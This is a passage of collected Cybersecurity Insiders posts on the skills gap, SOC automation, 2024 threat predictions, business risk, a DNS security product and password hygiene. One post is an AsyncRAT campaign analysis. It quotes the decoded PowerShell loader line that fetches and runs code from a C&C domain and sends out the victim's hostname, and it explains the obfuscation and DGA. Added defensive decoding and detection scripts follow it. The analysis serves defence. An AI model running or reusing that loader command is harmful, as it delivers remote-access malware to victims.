[By Irfan Shakeel, Vice President of Training and Certification Services at OPSWAT]

Addressing the cybersecurity skills gap stands out as a paramount challenge in fortifying companies’ cyber resilience today, especially given that the remedy is neither swift nor straightforward. Transforming the educational system to align with the modern requirements of cybersecurity professionals, or retraining existing technical talent for cybersecurity roles, entails a prolonged collaborative effort between the private and public sectors. Nevertheless, organisations can proactively navigate the cyber skills gap by prioritising initiatives centred on retraining and maximising the potential of existing cybersecurity talent.

The cyber skills gap in the critical infrastructure sector

The cybersecurity skills gap is a persistent issue because of a constantly growing skills demand. In the UK over the past year, cybersecurity job postings went up by 30%, according to the National Cyber Security Centre (NCSC). Yet to meet this growing demand, the UK’s cybersecurity labour force would need an additional 11,200 employees.

This challenge becomes more acute when you drill down into the need for sector-specific cybersecurity skills. Take, for instance, the safeguarding of cyber-physical systems, which are integral to the digitalisation of the critical infrastructure (CI) sector. This necessitates a distinct skill set compared to securing the digital environment of an enterprise.

However, most cybersecurity training and information available online addresses IT security rather than operational technology (OT) security. Advancing cybersecurity skills for CI is imperative because compromises in cyber-physical systems can be detrimental to public safety and national security. This means CI organisations must focus their attention on empowering their current talent.

Fostering security-driven culture

From the shortage of experts in critical areas such as threat analysis, penetration testing, and AI, to the broader issues of workforce diversity, the problems contributing to the cyber skills gap are complex and evolving. That said, Verizon’s report unveiled that 74% of data breaches resulted from human errors.

Organisation-wide security awareness and a culture that promotes security practices limit human errors and alleviate the workload of cybersecurity employees. A good security culture encourages employees to identify suspicious items such as emails or activity and immediately flag them to relevant teams. This behaviour stops attacks before they can travel through a company’s environment. A security culture can be implemented by driving employee awareness of best practices and continuously measuring the impact of internal initiatives.

Leveraging AI in cybersecurity training

There is a significant opportunity to leverage AI for enhanced cybersecurity training. Through AI, organisations can personalise their training programmes to the learning styles and knowledge levels of individual users. AI-powered chatbots can act as personal coaches to make training more engaging. Stimulating conversation throughout the learning process can help users retain knowledge more effectively.

AI can also be used to create attack scenarios to help analysts understand how to detect and respond to modern threats effectively. This technique can also be applied to non-technical employees. For example, Large Language Models (LLMs) can be used to simulate phishing attacks, helping employees better recognise potential threats.

Providing hands-on, in-person training

Providing hands-on training experience is essential to gain a deep understanding of security products and practices and how to apply them in real-life scenarios.

Although the Covid-19 pandemic established the habit of remote training, when it comes to developing new skills it is important to maintain frequent personal interaction. This allows for asking questions in real time and learning from peers. By providing immersive and customised training, cybersecurity skills bootcamps enable effective knowledge exchange. For example, OPSWAT recently launched the OPSWAT Academy Bootcamp, a global in-person training programme.

Recruiting from non-cybersecurity backgrounds

Organisations should also be open to recruiting cybersecurity professionals who may not have a traditional background. More than half of hiring managers (59%) surveyed in research by ISC2 and OPSWAT saw an increase in job applicants from technically experienced people with no prior cybersecurity experience. Professionals without prior cybersecurity experience can instead offer a diverse technical background that sets them up for a successful cybersecurity career.

As organisations continue to grapple with the cyber skill gap, it is important they recognise there are initiatives and strategies that can be readily implemented to empower cybersecurity employees and build cyber resilience. This is especially important in the CI sector, where the implications of skill shortages are more pressing.

The post Navigating the Cybersecurity Skills Gap in Critical Infrastructure appeared first on Cybersecurity Insiders.

[By Michael Mumcuoglu, CEO and Co-Founder, CardinalOps]

It is worth remembering: cybersecurity professionals win only when attackers lose. Although it may feel like a victory, we don’t win when we merely maintain operations, or even when we put processes in place and those processes are followed perfectly.

Attackers are constantly thinking of new ways to break into environments and avoid detection. Defending against yesterday’s attacks is important and will undoubtedly make an organization safer, but because it is so challenging to get the right processes followed, it can easily become our only focus. So how do we achieve this goal? One key element is that our SOC teams must evolve.

What is compelling us to evolve?

The global annual cost of cybercrime is predicted to reach $9.5 trillion USD in 2024, according to Cybersecurity Ventures. We are consistently reminded that adversaries behind cyber espionage and breaches are evolving, but there are also internal pressures that are forcing us to adapt.

Let’s look at the top three:

#1 Expanding attack surfaces

As businesses and organizations are empowered by technological advances, data proliferates across an increasing number of environments, all of which must be protected, and this will only continue to accelerate in the years to come. Mass digitalization of identities, data lakes, and cloud and edge computing have each contributed to the exponential expansion of the attack surface.

#2 A shortage of well-trained security talent

Among the most critical concerns in the cybersecurity community is the apparent scarcity of a workforce with the requisite skills and training to keep pace with the expanding attack surface. According to recent research from ISC2, the global industry could benefit from over 3 million additional cybersecurity professionals. The natural growth of IT infrastructure and digital commerce are among the drivers of increased demand for cybersecurity jobs and have consequently broadened the threat landscape while incentivizing cybercriminals.

#3 Excessive alerts from an overwhelming number of tools

A simple – and popular – solution to the security talent shortage has seen cybersecurity providers increasingly implementing automated tools in SOC operations. On a fundamental level, this allows traditionally monotonous tasks to be maintained while freeing our teams to focus manual efforts on cognitive decision-making. However, these automated tools relay a never-ending stream of alerts, some of which are false positives, some difficult to identify and successfully triage, and others simply informative. The vast quantities of information relayed by automated tools therefore bring SOC teams their fair share of pros and cons.

Ultimately, the modern SOC requires a solid procedural foundation, but also a new set of processes that rely on human innovation.

Striking a balance between human creativity and automation

Examining the strengths and weaknesses of manual vs automated operations results in a conundrum. Is it more effective and efficient to utilize the consistency delivered by automated processes? Or is this consistency sacrificing the advantages of innovation that organically stems from human creativity?

For SOCs, discernment may be found along a continuum. On one side, alert triage as well as reporting and metrics benefit significantly from the consistency of automation, while quality threat modeling and hunting are rewarded with the creativity of human innovation.

Automated and cloud-enabled services have allowed organizations to sift through data at unprecedented volumes, and with proper investment can ensure that SOCs are optimizing their continuous management of detection rules.

Threat hunting often requires “outside of the box” thinking to anticipate and identify potential probes or attacks on cyber assets. This integral role derives benefit from an injection of creativity from experienced cybersecurity professionals. These professionals must be skilled and focused while most importantly, being empowered to conduct threat modelling and hunting without secondary and tertiary responsibilities.

Injecting human creativity into your SOC is a benefit to the human team as well as to the automated operations. This can result in an engaged workforce that is far less prone to being overwhelmed or experiencing burnout. Striking this balance between each set of strengths while remaining cognizant of shortcomings is critical to deploying a consummate SOC.

Utilizing Proactive Threat Intelligence

Presently, SOC teams are fully aware that threat intelligence operations and management are well worth the time and effort. The goal for a superior SOC should be to take advantage of proactivity that drives the creation and tuning of unique security controls. Every organization has different “crown jewel” assets worth defending, and consistently analyzing the opportunities an adversary would have to get past the fortifications in place is a fundamental tactic for establishing security.

The MITRE ATT&CK framework is a fine example of how SOC teams can evolve with a proactive, informed approach to threat defense. Since its creation nearly a decade ago, the framework has helped teams that previously used threat intelligence in a reactive mode to dynamically drive the creation and fine-tuning of security controls.

The framework operates with very precise controls, which provides more in-depth recommendations to strengthen and tighten up specific rules. This allows SOC teams to significantly reduce erroneous alerts and focus their time and energy on the alerts stemming from specialized rules meant to protect their organization’s specialized assets.

The Future of the SOC

While the hybrid model of SOCs and the workforce behind them may require evolution, our understanding needn’t follow suit. As defined by Gartner,

“A security operations center provides centralized and consolidated cybersecurity incident prevention, detection, and response capabilities.” 

SOC modernization extends far beyond technology alone, providing organizations with an opportunity to reassess skills and roles and support a distributed workforce – while incorporating human creativity and innovation as a strategic force multiplier.

The post SOC Evolution Is About More Than Automation appeared first on Cybersecurity Insiders.

[By Dominik Samociuk, PhD, Head of Security at Future Processing]

When more than 6 million ancestry and genetic data records were breached from 23andMe’s secure database, companies were forced to confront and evaluate their own cybersecurity practices and data management. With approximately 2.39 million instances of cybercrime experienced across UK businesses last year, the time to act is now.

If even the most secure and unsuspecting businesses aren’t protected, then every business should consider itself, and operate as, a target. As we roll into 2024, it is unlikely there will be a reduction in cases like these. It is expected there will be an uptick in the methods and levels of sophistication employed by hackers to obtain sensitive data – something that continues to increase in value as a high-ticket commodity.

In the next two years, it is predicted that the cost of cyber damage will grow by 15% yearly, reaching a peak of $10.5 trillion in 2025. We won’t be saying goodbye to ransomware in 2024, but rather saying hello to an evolved, automated, adaptable, and more intelligent form of it. But what else is expected to take the security industry by storm in 2024?

Offensive vs. Defensive Use of AI in Cybersecurity

Cybersecurity is a symbiotic cycle for companies. From attack to defence, an organisation’s security experts must be constantly defensive against malicious attacks. In 2024, there will be a rise in the use of Generative AI with an alarming 70% of workers using ChatGPT not making their employers aware – opening the door for significant security issues, especially for outsourced tasks like coding. And while its uses are groundbreaking, Gen AI’s misuses, especially when it comes to cybersecurity, are cause for concern.

Cybersecurity breaches will come from more sophisticated sources this year. As artificial intelligence (AI) continues to surpass development expectations, systems that can analyse and replicate humans are now being employed. With platforms like LOVO AI and Deepgram making their way into mainstream use – often for hoax or ruse purposes – sinister uses of these platforms are being employed by cybercriminals to trick unsuspecting victims into disclosing sensitive network information from their business or place of work.

Cybercriminals target the weakest part of any security operation – the people – by encouraging them to divulge personal and sensitive information that might be used to breach internal cybersecurity. Further, Generative AI platforms like ChatGPT can be used to automate the production of malicious code introduced internally or externally to the network. On the other hand, AI is being used to strengthen cybersecurity in unlikely ways. Emulating a cinematic cyber-future, AI can be used to detect malware and abnormal system or user activity and alert human operators. It can then equip staff with the tools and resources needed to respond in these instances.

Inevitably, like any revolutionary platform, AI produces hazards and opportunities for misuse and exploitation. Seeing a rise in alarming cases of abuse, cybersecurity experts must consider the effect these might have before moving forward with an adaptable strategy for the year.

Data Privacy, Passkeys, and Targeting Small Businesses

Cybercriminals using their expertise to target small businesses is expected to increase in 2024. By nature, small businesses are unlikely to operate at a level able to employ the resources needed to combat consistent cybersecurity threats that larger organisations face on a daily basis. Therefore, with areas of cybersecurity unaccounted for, cybercriminals are likely to increasingly exploit vulnerabilities within small business networks.

They may also exploit the embarrassment felt by small business owners on occasions like these. If their data is being held for ransom, a small business owner, without the legal resources needed to fight (or tidy up) a data breach is more likely to give in to the demands of an attacker to save face, often setting them back thousands of pounds. Regular custom, loyalty, trust, and reputation makes or breaks a small business. Even the smallest data breaches can, in one fell swoop, lay waste to all of these.

Unlikely to have dedicated cybersecurity teams in place, a small business will often employ less secure and inexpensive data management solutions – making them prime targets. Contrary to expectations, in 2024 we will not say goodbye to the use of ransomware. In fact, these tools are likely to become more common against larger, well-insured companies due to the gold rush on data harvesting.

Additionally, changing passwords will become a thing of the past. With companies like Apple beta-testing passkeys in consumer devices and even Google describing them as ‘the beginning of the end of the password’, businesses will no doubt begin to adopt this more secure technology, stored on local devices, for any systems that hold sensitive data. Using passwordless forms of identification mitigates issues associated with cyber criminals’ common method of exploiting personal information for unauthorised access.

Generative AI’s Impact on Information Warfare and Elections

In 2024, more than sixty countries will see an election take place, and as politics barrel towards all-out war in many, it is more important than ever to safeguard cybersecurity to account for a tighter grip on fact-checked information and official government communications. It is likely that we will see a steep rise in Generative AI supported propaganda on social media.

In 2016, amidst the heat of a combative and unfriendly US Presidential election, Republican candidate Donald Trump popularised the term ‘Fake News’, which eight years later continues to plague realms of the internet in relation to ongoing global events. It was estimated that 25% of tweets sampled during this time, related to the election, contained links to intentionally misleading or false news stories in an attempt to further a viewpoint’s popularity. Online trust comes hand-in-hand with security; without one, the other cannot exist.

While in 2016, the contemporary use of AI was extremely limited in today’s terms, what becomes of striking concern is the access members of the public have to platforms where, at will, they can legitimise a controversial viewpoint, or ‘fake news’ by generating video or audio clips of political figures, or quotes and news articles with a simple request. The ability to generate convincing text and media can significantly influence public opinion and sway electoral processes, destabilising a country’s internal and external cybersecurity.

Of greatest concern is the unsuspecting public’s inability to identify news generated by AI. Cornell University found that people judged false news articles generated by AI to be credible over two-thirds of the time. Further studies found that humans were unable to identify articles written by ChatGPT beyond a level of random chance. As Generative AI’s sophistication increases, it will become ever more difficult to identify what information is genuine and safeguard online security. This is critical, as Generative AI can now be used as ammunition in information warfare through the spread of hateful, controversial, and false propaganda during election periods.

In conclusion, 2024, like 2023, will see a great shift in focus toward internal security. A network is at its most vulnerable when the people who run it aren’t aligned in their strategies and values. Advanced technologies, like AI and ransomware, will continue to be a rising issue for the industry, and not only destabilise networks externally, but internally, too, as employees are unaware of the effects using such platforms might have.

The post Securing The Future: Cybersecurity Predictions for 2024 appeared first on Cybersecurity Insiders.

[By Fernando Martinez, Security Researcher, AT&T Alien Labs]

Research from AT&T Alien Labs has identified a campaign to deliver AsyncRAT onto unsuspecting victim systems. For at least 11 months, this threat actor has been working on delivering the Remote Access Trojan (RAT) through an initial JavaScript file, embedded in a phishing page. More than 300 samples and over 100 domains later, the threat actor remains persistent in their intentions.

What is AsyncRAT?

AsyncRAT is an open-source remote access tool released in 2019 and still available on GitHub. As with any remote access tool, it can be leveraged as a Remote Access Trojan, especially in this case where it is free to access and use. For that reason, it is one of the most commonly used RATs; its characteristic capabilities include keylogging, exfiltration techniques, and initial access staging for final payload delivery.

Since it was initially released, this RAT has shown up in several campaigns with numerous alterations due to its open-source nature, and has even been used by the APT Earth Berberoka, as reported by TrendMicro.

In early September 2023, AT&T Alien Labs observed a spike in phishing emails targeting specific individuals in certain companies. The GIF attachment led to an SVG file, which in turn led to a download of a highly obfuscated JavaScript file, followed by other obfuscated PowerShell scripts and a final execution of an AsyncRAT client. This peculiarity was also reported by some users on X (formerly Twitter), like reecDeep and Igal Lytzki. Certain patterns in the code allowed us to pivot and look for more samples in this campaign, resulting in samples going back to February 2023.

How it works

The modus operandi of the loader involves several stages which are further obfuscated by a Command and Control (C&C) server checking if the victim could be a sandbox prior to deploying the main AsyncRAT payload. In particular, when the C&C server doesn’t rely on the parameters sent, usually after stage 2, or when it is not expecting requests on a particular domain at that time, the C&C redirects to a benign page.

During the whole campaign, JavaScript files have been delivered to targeted victims through malicious phishing web pages. These files, despite clearly being a script, contain long strings that are commented out, with texts composed of randomly positioned words, with ‘Melville’, ‘church’, ‘chapter’ and ‘scottish’ being the most repeated words.

This script is highly obfuscated, with several functions to move around the detectable commands/strings, and with the URL to the C&C being encoded in the form of decimal values. In order to decrypt the URL, the script subtracts a constant from the value and converts the number into an ASCII (data encoding) character. For example, the following array of numbers (102 131 138 138 141 62 117 141 144 138 130 63), when subtracted by 30 and converted to ASCII, corresponds to the string ‘Hello World!’

On top of modifying the C&C and URL every so often, the threat actor tries to generate a completely new version of the loader for each victim. The new files carry new randomized variable names, or a new constant subtracted to get the ASCII representation of the URL, which makes detection techniques difficult to perform consistently.
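The decimal-minus-constant encoding described above, as an added analyst-side example that is not from the AT&T Alien Labs write-up: a decoder for the scheme plus a brute-force recovery of the constant, since the article notes the constant changes per sample. Only the ‘Hello World!’ array is from the article; the URL sample, its constant (47) and the placeholder hostname are constructed.

```python
# Added example (not from the AT&T Alien Labs write-up): decoding the
# "decimal value minus constant" string obfuscation the loader uses, and
# recovering the per-sample constant when it is not known in advance.
import string

# Array quoted in the article: each value minus 30 is an ASCII code.
HELLO_WORLD_SAMPLE = [102, 131, 138, 138, 141, 62, 117, 141, 144, 138, 130, 63]

# Constructed sample: a hypothetical per-victim variant using a different
# constant (47) and a placeholder URL, built the way the loader would encode it.
URL_SAMPLE = [ord(ch) + 47 for ch in "http://example.invalid/2.php"]

# Characters that make a candidate plausible as readable text or a URL.
_PLAUSIBLE = set(string.ascii_letters + string.digits + " ./:-?=&_")


def decode_decimal_string(values, constant):
    """Subtract `constant` from every value and map the results to ASCII.

    Returns None if any result falls outside printable ASCII (32..126),
    which rules `constant` out as the one the script used.
    """
    out = []
    for v in values:
        code = v - constant
        if not 32 <= code <= 126:
            return None
        out.append(chr(code))
    return "".join(out)


def _score(candidate):
    """Heuristic ranking: URL-looking text first, then readable text."""
    score = sum(1 for ch in candidate if ch in _PLAUSIBLE)
    if candidate.startswith("http"):
        score += 10
    return score


def recover_constant(values, max_constant=255):
    """Brute-force the subtracted constant over 0..max_constant.

    Returns (constant, decoded_string) for the most plausible candidate,
    or None if no constant yields printable ASCII at all.
    """
    best = None
    for constant in range(max_constant + 1):
        candidate = decode_decimal_string(values, constant)
        if candidate is None:
            continue
        s = _score(candidate)
        if best is None or s > best[0]:
            best = (s, constant, candidate)
    if best is None:
        return None
    return best[1], best[2]


if __name__ == "__main__":
    print(decode_decimal_string(HELLO_WORLD_SAMPLE, 30))   # Hello World!
    print(recover_constant(HELLO_WORLD_SAMPLE))            # (30, 'Hello World!')
    print(recover_constant(URL_SAMPLE))                    # (47, 'http://example.invalid/2.php')
```

The plausibility score is a heuristic: several constants produce printable output, so an analyst should still eyeball the top candidates when the decoded text is not an obvious URL.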

After a GET request, the C&C sends a script over HTTP. This script contains base64 code and the functions needed to decode it. The decoded data is then XOR’ed (“exclusively or’ed”) against a key hardcoded in the script, unpacked with Gunzip, and copied to memory to execute the payload filelessly in PowerShell. Once again, all the code has variables with long randomized names, commands that are ciphered and need to be converted to ASCII, and functions to evade endpoint detection and response (EDR), static detections, and analysis by researchers.

After the decoding, decrypting and decompressing the code, the ending script can be summarized in the command ‘iex(curl -useb “http://sduyvzep[.]top/2.php?id=$env:computername&key=$wiqnfex”)’ where ‘$env:computername’ is the victim’s hostname. The second variable ‘$wiqnfex’ is a number of around 12 digits representing a value for the probability that the infected machine is a Virtual Machine or Sandbox.

If the C&C considers the victim could be a VM or Sandbox, it returns a decoy sample attempting to look like AsyncRAT. However, when the sample is decompiled, it is named “DecoyClient”, contains swear words in Russian or “LOL” as variable names, in an attempt to mock researchers.

Understanding AsyncRAT’s Network Characteristics 

The AsyncRAT code is constantly changing, heavily obfuscated and randomized, making it hard to detect. However, that is not the case for the network infrastructure. Based on our research, most domain structures associated with AsyncRAT share a few common characteristics:

  • Top Level Domain (TLD): top
  • 8 random alphanumeric characters
  • Registrant organization: ‘Nicenic.net, Inc’ (the registrar)
  • Country code South Africa (ZA)
  • Created a few days before its use

When researching domains with similar uncommon characteristics (and when the Anti-Sandbox analysis is passed), a new set of domains appears. These samples had a script to calculate the domain based on the current date. This allows the samples to automatically change the C&C domain with time and evade being blocked if the code is not properly reviewed.

The Domain Generation Algorithm (DGA) generates a seed using the day of the year and modifies it. Part of these modifications ensure that a new domain is populated every seven days, with a new domain purposely generated every Sunday. Afterward, this seed is used to pick 15 letters from ‘a’ to ‘n’ to generate the domain. The other variables in the seed (i.e. 2024 and 6542) — or the characters used to create the domain — change in some of the scripts to generate a different pattern of domains.
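A detection pass over DNS query logs for the two domain shapes described above (the eight-character alphanumeric .top domains and the fifteen-letter ‘a’ to ‘n’ DGA domains), as an added example that is not part of the AT&T Alien Labs write-up. It assumes the DGA domains also sit under .top, uses a hypothetical key=value resolver log format, and the log lines are constructed; only sduyvzep.top is taken from the article.

```python
# Added example (not from the AT&T Alien Labs write-up): flag DNS queries
# whose domain shape matches the two patterns the article describes:
#   - hardcoded C&C style: 8 alphanumeric characters under .top
#   - DGA style: 15 letters drawn only from 'a'..'n' under .top (assumed .top)
# Registrant-organisation and registration-age checks need WHOIS data and
# are out of scope here.
import re

HARDCODED_STYLE = re.compile(r"^[a-z0-9]{8}\.top$")
DGA_STYLE = re.compile(r"^[a-n]{15}\.top$")

# Constructed log lines in a hypothetical "key=value" resolver format.
# sduyvzep.top is the domain quoted in the article; the rest are made up.
SAMPLE_DNS_LOG = """\
2024-01-15T10:22:01Z client=10.0.0.5 query=sduyvzep.top type=A
2024-01-15T10:22:05Z client=10.0.0.5 query=www.example.com type=A
2024-01-15T10:23:11Z client=10.0.0.7 query=abcdefghijklmna.top type=A
2024-01-15T10:23:40Z client=10.0.0.7 query=abcdefghijklmno.top type=A
2024-01-15T10:24:02Z client=10.0.0.9 query=cdn.example.net type=AAAA
"""

_LOG_RE = re.compile(r"client=(?P<client>\S+)\s+query=(?P<query>\S+)")


def classify_domain(domain):
    """Return 'hardcoded-style', 'dga-style' or None for one domain name.

    Case and a trailing dot are normalised so FQDN-style log entries match.
    """
    name = domain.lower().rstrip(".")
    if HARDCODED_STYLE.match(name):
        return "hardcoded-style"
    if DGA_STYLE.match(name):
        return "dga-style"
    return None


def scan_dns_log(text):
    """Return a list of (client, domain, label) for every matching query."""
    hits = []
    for line in text.splitlines():
        m = _LOG_RE.search(line)
        if not m:
            continue
        domain = m.group("query").lower().rstrip(".")
        label = classify_domain(domain)
        if label:
            hits.append((m.group("client"), domain, label))
    return hits


if __name__ == "__main__":
    for client, domain, label in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"{client} -> {domain}: {label}")
```

Both patterns are shape heuristics that will also match some legitimate short .top domains, so treat a hit as a lead to enrich with registrar, creation date and hosting ASN rather than as a verdict.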

On top of the matching characteristics of the registrant, the Autonomous System Numbers (ASN) also carry valuable data. The domains from the first group that were hardcoded within the samples our team observed were all hosted on BitLaunch, while the DGA domains were hosted on DigitalOcean.

DigitalOcean is a very popular hosting provider that requires no introduction. BitLaunch, on the other hand, is not as well known among common users. This ASN, with identifier 399629, is known for accepting payment in cryptocurrencies like Bitcoin, Ethereum or Litecoin. This kind of offering is not malicious by itself; however, the type of user this model attracts includes cybercriminals, who primarily operate with crypto and can leverage the anonymity of certain cryptocurrencies. Additionally, BitLaunch can be used as a payment bridge for servers on DigitalOcean, Vultr or Linode. The cheapest option is to host with BitLaunch directly, but the alternative allows users to pay in crypto and be hosted in a more reliable ASN.

Going back to the DGA domains that were hosted in DigitalOcean, when looking at the scanning activity generated by OTX on the DGA domains, it shows a default webpage with the message ‘Welcome to the BitLaunch LEMP app. Log in to your server to configure your LEMP installation.’ This might be an indication that these domains are hosted in DigitalOcean but paid for through BitLaunch.

Overall, the described campaign shows how determined the threat actors are to infect their victims and go unnoticed, with hundreds of different samples during 2023. Additionally, the effort to obfuscate the samples and constantly make modifications to them demonstrates how the threat actors value discretion. However, this blog is living proof that studying the actors’ activity through the year allows us to identify them when they come back with any payload with a wide range of patterns tracked by AT&T Alien Labs.

The registration of domains and subsequent AsyncRAT samples are still being observed at the time of writing this article.

The post AsyncRAT Loader Delivers Malware via JavaScript appeared first on Cybersecurity Insiders.

[By Scott Sayce, Global Head of Cyber at Allianz Commercial]

The newly released Allianz Risk Barometer revealed that cyber incidents such as ransomware attacks, data breaches, and IT disruptions are the biggest worry for companies globally, as well as in the United States, in 2024. The 13th annual business risk ranking incorporates the views of 3,069 risk management experts in 92 countries and territories, including CEOs, risk managers, brokers and insurance experts.

Following two years of high but stable loss activity, 2023 saw a worrying resurgence in ransomware and extortion losses, as the cyber threat landscape continues to evolve. Hackers are increasingly targeting IT and physical supply chains, launching mass cyber-attacks, and finding new ways to extort money from businesses, large and small. It’s little wonder that companies rank cyber risk as their top concern (36% of responses – 5 percentage points ahead of the second top risk) and, for the first time, across all company sizes as well: large (>US$500mn annual revenue), mid-size ($100mn+ to $500mn), and smaller (<$100mn).

It is the cause of business interruption that companies fear most, while cyber security resilience ranks as firms’ most concerning environmental, social, and governance (ESG) challenge. It is also the top company concern across a wide range of industries, including consumer goods, financial services, healthcare, and telecommunications, to name just a few.

Ransomware on the rise

By the start of the next decade, ransomware activity alone is projected to cost its victims $265bn annually. Activity surged by 50% year-on-year during the first half of 2023 with so-called Ransomware-as-a-Service (RaaS) kits, where prices start from as little as $40, a key driver. Gangs are also carrying out more attacks faster, with the average number of days taken to execute one falling from around 60 days in 2019 to four.

Most ransomware attacks now involve the theft of personal or sensitive commercial data for the purpose of extortion, increasing the cost and complexity of incidents, as well as bringing greater potential for reputational damage. Allianz Commercial’s analysis of large cyber losses (€1mn+) in recent years shows that the number of cases in which data is exfiltrated is increasing – doubling from 40% in 2019 to almost 80% in 2022, with 2023 activity tracking even higher.

The power of AI (to accelerate cyber-attacks)

AI adoption brings numerous opportunities and benefits, but also risk. Threat actors are already using AI-powered language models like ChatGPT to write code. Generative AI can help less proficient threat actors create new strains and variations of existing ransomware, potentially increasing the number of attacks they can execute. An increased utilization of AI by malicious actors in the future is to be expected, necessitating even stronger cyber security measures.

Voice simulation software has already become a powerful addition to the cyber criminal’s arsenal. Meanwhile, deepfake video technology designed and sold for phishing frauds can also now be found online, for prices as low as $20 per minute.

Mobile devices expose data

Lax security and the mixing of personal and corporate data on mobile devices, including smartphones, tablets, and laptops, is an attractive combination for cyber criminals. Allianz Commercial has seen a growing number of incidents caused by poor cyber security around mobile devices. During the pandemic many organizations enabled new ways of accessing their corporate network via private devices, without the need for multi-factor authentication (MFA). This also resulted in a number of successful cyberattacks and large insurance claims.

The roll-out of 5G technology is also an area of potential concern if not managed appropriately, given it will power even more connected devices. However, many IoT devices do not have a good record when it comes to cyber security, are easily discoverable, and will not have MFA mechanisms, which, together with the addition of AI, presents a serious cyber threat.

Security skills shortage a factor in incidents

The current global cyber security workforce gap stands at more than four million people, with demand growing twice as fast as supply. Gartner predicts that a lack of talent or human failure will be responsible for over half of significant cyber incidents by 2025. Shortage of skilled workforce ranks joint #5 in the top concerns of the media sector and is a top 10 risk in technology in the Allianz Risk Barometer.

It is difficult to hire good cyber security engineers, and without skilled personnel, it is more difficult to predict and prevent incidents, which could mean more losses in the future. It also impacts the cost of an incident. Organizations with a high level of security skills shortage had a $5.36mn average data breach cost, around 20% higher than the actual average cost, according to the IBM Cost of a Data Breach Report 2023.

Early detection is key

Preventing a cyber-attack is therefore becoming harder, and the stakes are higher. As a result, early detection and response capabilities and tools are becoming ever more important. Investment in detection backed by AI should also help to catch more incidents earlier. If companies do not have effective early detection tools, this can lead to longer unplanned downtime and increased costs, and have a greater impact on customers, revenue and reputation. The lion’s share of IT security budgets is currently spent on prevention, with around 35% directed to detection and response.

SMEs the increasing sweet spot

For smaller and mid-size companies (SMEs), the cyber risk threat has intensified because of their growing reliance on outsourcing for services, including managed IT and cyber security providers, given these firms lack the financial resources and in-house expertise of larger organizations.

As larger companies have ramped up their cyber protection, criminals have targeted smaller firms. SMEs are less able to withstand the business interruption consequences of a cyber-attack. If a small company with poor controls or inadequate risk management suffers a significant incident, there is a chance it might not survive.

Businesses can take a proactive approach to tackling cyber threats by ensuring their cyber security strategy identifies their most crucial information system assets. Then, they should deploy appropriate detection and monitoring software, both at the network perimeter and on endpoints, often involving collaboration with cyber-security service partners, to uncover and nullify threats attempting to gain network access.

To view the 2024 Allianz Risk Barometer, please visit: Allianz Risk Barometer

The post Cybersecurity Tops 2024 Global Business Risks appeared first on Cybersecurity Insiders.

In an era where online threats no longer discriminate by business size, Control D, powered by Windscribe VPN’s robust security expertise, announced today the launch of ‘Control D for Organizations’. This modern DNS service democratizes cybersecurity, making it accessible to businesses of every size, from budding start-ups to late-stage SMBs and MSPs.

Leveraging the strength of the world’s largest physical VPN network, Control D is bringing unmatched expertise in navigating cybersecurity challenges and global surveillance into the hands of businesses that traditionally lacked these advanced protections.

Control D for Organizations is geared at companies, schools, and NGOs of all sizes, offering simplicity for smaller teams and highly specific and advanced controls for larger organizations. Control D is packed with an arsenal of tools designed to secure and empower diverse teams:

1. Malware Blocking: Protecting business continuity against malicious threats with state-of-the-art detection techniques, all built in-house. Protect individual devices or entire networks in just a few minutes.

2. Multi-Tenancy: Addresses the complexity of managing access and filtering policies across different departments, subsidiaries, or customer accounts within a large enterprise or service provider setting.

3. Modern Protocols: Security cannot be assured using standard DNS protocols. That’s why Control D supports all modern (and encrypted) protocols like DNS-over-HTTPS/3 and DNS-over-TLS.

4. Custom Filtering: Highly granular web filters provide power users with ultimate control, while more general curated lists allow DNS security newcomers to gain maximum security benefits with minimal effort.

5. Actionable Insights: Detailed network activity analytics empowers businesses to improve their security posture and make strategic decisions.

Control D for Organizations is more than a security tool—it’s a declaration that first-rate cybersecurity is no longer a luxury. It embodies a new era where organizations, irrespective of their size or financial prowess, can confidently protect their operations and data.

‘Control D for Organizations’, Empowering Every Business with Advanced Cybersecurity

Control D is a pioneer in software security, devoted to offering next-level, user-centric solutions. Backed by the years of security expertise of Windscribe VPN which protects over 68 million people, Control D leverages the largest physical VPN network and one of the fastest anycast DNS networks to deliver unparalleled security and freedom from surveillance on a global scale.

Join the DNS security revolution and equip your business with Control D. Visit controld.com for more information and take your first step towards comprehensive digital protection. Additional assistance for onboarding channel partners is available. A free trial, with no payment details required, is also available.

Media Contact Information:

For further details, please contact Yegor Sak at business@controld.com or our channel partner lead Joe Jaghab at Joe@controld.com

The post ‘Control D for Organizations’ Launched – Democratizing Cybersecurity for Organizations of All Sizes appeared first on Cybersecurity Insiders.

The growth of our digital footprints has resulted in concerns about online identity security. Traditional password systems have become outdated, creating fertile ground for increasingly sophisticated cyber threats. On this Change Your Password Day, we should not only change our passwords but also examine the very essence of digital security.

Just think of how annoying it is to see ‘Login Failed.’ It is a message many people have seen too often, and it shows that the system does not meet the needs of modern security. People’s reluctance to manage many passwords has been the cause of some of the biggest security breaches to date, and change must happen.

Protecting users in the present

When looking at protecting themselves, organisations need to ensure they are acting in the here and now. Adam Marrè, Chief Information Security Officer at Arctic Wolf, highlights that “passwords are the lifeblood of our online persona; we need to take them seriously to protect ourselves from the threat of cybercrime.” He highly recommends that organisations have strong password management practices, including regular updates to passwords and ensuring they “don’t consist of words or phrases that can be associated directly with you, your interests or family.”

At the same time Marrè observes that, while people should use unique passwords for every account, “we must turn on two-factor authentication if it’s available.” He adds, “with so many passwords to keep track of, password discipline is difficult.”

David Warburton, Director, F5 Labs, agrees with this advice, but with the caveat that, “while multi-factor authentication is still strongly recommended wherever possible, the vast number of tricks attackers have at their disposal means it is far from the unbreakable security control it once was.” He states that businesses need “solutions that directly disrupt attacker ROI and that can curate and analyse network, device, and environmental telemetry signals across data centres, clouds, and architectures. By modelling threat intelligence across similar attack profiles and risk surfaces, affected organisations can autonomously deploy appropriate countermeasures.”

Our present security practices conceal more danger than meets the eye, according to Andy Thompson, Offensive Research Evangelist at CyberArk Labs. “Simply putting strong passwords in place is no longer good enough. In fact, no matter how strong your password is, if a threat actor gets a hold of a cookie, none of it matters,” he explains. “Instead, we need a mechanism that mandates users to frequently change their credentials. And, each time, this mechanism must require strong, unique passwords, not iterative Password1, Password2 changes.”

Paul Anderson, VP UK & Ireland at Fortinet, concludes, “no single organisation can combat cybercrime alone, even with the most effective technologies and skilled security professionals in place. Having strong passwords is a way to prevent threats from entering networks, while regularly changing passwords to ensure data is protected demonstrates how everyone in a business has a part to play to maintain security.”

The future of passwordless 

